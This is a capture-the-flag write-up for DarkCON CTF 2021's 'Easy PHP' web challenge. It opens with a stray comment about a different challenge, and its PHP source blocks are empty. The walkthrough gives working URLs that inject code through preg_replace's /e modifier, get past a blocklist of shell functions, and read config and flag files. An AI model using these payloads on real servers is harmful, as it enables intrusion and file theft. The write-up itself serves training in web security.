Awesome and well ellaborated challenge, solved by alternative way.. enjoyed a lot this one. Thanks. Original writeup (http://dann.com.br/php-winning-the-race-condition-vs- temporary-file-upload-alternative-way-to-easy_php-n1ctf2018/).# DarkCON CTF 2021 – Easy PHP * **Category:** web * **Points:** 384 ## Challenge > Please note.... > > Note: This chall does not require any brute forcing > > http://easy-php.darkarmy.xyz/ ## Solution The normal webpage returns a welcome advice. ``` Welcome DarkCON CTF !! ``` But connecting to `http://easy-php.darkarmy.xyz/robots.txt` will reveal the following content. ``` ?lmao ``` So you can connect to `http://easy-php.darkarmy.xyz/?lmao` which will return the following PHP code. ```php ``` Basically you can craft your own `preg_replace`. For example, connecting to `http://easy-php.darkarmy.xyz/?bruh=test&nic3=/DarkCON/` will give you the following. ``` Welcome test CTF !!Welcome DarkCON CTF !! ``` The [`preg_replace` is subject to RCE using `/e`](https://medium.com/@roshancp/command-execution-preg-replace-php- function-exploit-62d6f746bda4). `http://easy-php.darkarmy.xyz/?bruh=phpinfo()&nic3=/DarkCON/e` will return the `phpinfo()` output. But `http://easy-php.darkarmy.xyz/?bruh=system(%27id%27)&nic3=/DarkCON/e` will be blocked by the `is_payload_danger` method. With some analysis, you can discover that `fread` and `fopen` are available, so you can read `config.php` with a payload like the following, specifying the `config.php` filename in another GET parameter to bypass the check. ``` base64_encode(fread(fopen($_GET['pwn'],'r'),512)) http://easy- php.darkarmy.xyz/?bruh=base64_encode(fread(fopen($_GET[%27pwn%27],%27r%27),512))&nic3=/DarkCON/e&pwn=config.php ``` The response is the following. ``` Welcome PD9waHAKZnVuY3Rpb24gaXNfcGF5bG9hZF9kYW5nZXIoJHBheWxvYWQpIHsKCXJldHVybiBwcmVnX21hdGNoKCcvZXhlY3xwYXNzdGhydXxzaGVsbF9leGVjfHN5c3RlbXxwcm9jX29wZW58cG9wZW58Y3VybF9leGVjfGN1cmxfbXVsdGlfZXhlY3xwYXJzZV9pbmlfZmlsZXxyZWFkZmlsZXxyZXF1aXJlfHJlcXVpcmVfb25jZXxpbmNsdWRlfGluY2x1ZGVfb25jZXxwcmludHxmaW5kfGZpbGV8YHxjb25maWd8dmFyX2R1bXB8ZGlyLycsJHBheWxvYWQpOwp9Cj8+Cg== CTF !!Welcome DarkCON CTF !! ``` Decoding the base64, you can discover the source code. ```php ``` Using `glob` function, which is not blocked, you can find an interesting file. ``` http://easy-php.darkarmy.xyz/?bruh=glob(%22*.php%22)[1]&nic3=/DarkCON/e ``` ``` Welcome flag210d9f88fd1db71b947fbdce22871b57.php CTF !!Welcome DarkCON CTF !! ``` You can read that file with the technique used before. ``` http://easy- php.darkarmy.xyz/?bruh=base64_encode(fread(fopen($_GET[%27pwn%27],%27r%27),512))&nic3=/DarkCON/e&pwn=flag210d9f88fd1db71b947fbdce22871b57.php ``` ``` Welcome ZGFya0NPTnt3M2xjMG1lX0Q0cmtDMG5fQ1RGXzJPMjFfZ2d3cCEhISF9Cg== CTF !!Welcome DarkCON CTF !! ``` Decoding the base64 you can discover the flag. ``` darkCON{w3lc0me_D4rkC0n_CTF_2O21_ggwp!!!!} ``` Original writeup (https://github.com/m3ssap0/CTF- Writeups/blob/master/DarkCON%20CTF%202021/Easy%20PHP/README.md).